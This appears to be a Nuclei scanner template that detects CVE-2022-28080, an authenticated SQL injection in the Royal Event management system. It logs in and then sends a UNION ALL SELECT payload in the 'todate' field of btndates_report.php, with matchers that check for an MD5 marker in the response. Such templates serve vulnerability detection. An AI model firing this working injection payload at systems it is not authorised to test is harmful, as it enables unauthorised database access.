id: CVE-2022-28080 info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 epss-score: 0.0114 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: event_management_system_project product: event_management_system tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms,intrusive http: - raw: - | POST /royal_event/ HTTP/1.1 Host: {{Hostname}} Content-Length: 353 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="username" {{username}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="password" {{password}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="login" ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- cookie-reuse: true matchers-condition: and matchers: - type: word words: - '{{md5("{{randstr}}")}}' - type: status status: - 200